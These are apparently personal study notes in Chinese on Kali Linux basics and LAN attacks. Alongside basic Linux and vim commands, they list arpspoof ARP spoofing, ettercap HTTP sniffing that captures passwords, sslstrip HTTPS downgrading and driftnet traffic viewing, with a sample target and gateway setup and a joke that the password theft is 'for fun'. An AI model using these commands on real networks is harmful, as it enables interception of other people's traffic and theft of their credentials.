技能树系列一----linux

##Linux 基础

---

1. 搭建了kali，无法联网是因为校园网锐捷客户端会自动关闭vm nat 服务 使用时关闭锐捷重新打开NAT服务

2. linux基础命令

·reboot 重新启动   ·shutdown -h now 关机   ·shutdown -r now 重启

·apt-get update(更新）/install(安装)

·find / -name sqlmap  (从根目录开始查找出现name参数(sqlmap)的文件夹)

ifconfig 查看网络ip ::::::::::(网卡:, ip:1

windows(本机):

3. arp攻击（局域网断网攻击）需关闭来宾网络防火墙!!

Arpspoof工具-------------->欺骗

arpspoof  -i 网卡 -t目标ip 网关 （截断流量

arp欺骗:echo 1 >/proc/sys/net/ipv4/ip_forward（转移流量是流量能从我的网关出去）

查看网卡流量中图片信息 driftnet -i eth0

查看局域网中ip：fping -asg 192.168.0.0/24

###http流量嗅探

Ettercap工具 ----------------->欺骗 DNS欺骗 流量嗅探  （抓包）

可获取用户输入盗取账号密码（仅用于http协议）（（玩耍专用=-=

实战：

目标机器 ： 192.168.0.103 网关：192.168.0.1

kali 攻击者：192.168.0.120

开启ip转发：

cat查看内容

回显为1则ip转发成功

使用arpspoof -i -t开启欺骗

ettercap -Tq -i 开启流量嗅探便能嗅探到目标机器上http流量

###https流量嗅探

ssh工具：/etc/init.d/ssh start 开启ssh

sslstrip > https的连接还原为http

-a -f -k

vim 文本编辑器 命令：vim + 文件名：

退出：ESC 然后 shift + ：输入q！不保存退出   

wq：保存退出

i 插入模式 

打开/etc/ettercap/etter.conf修改了文件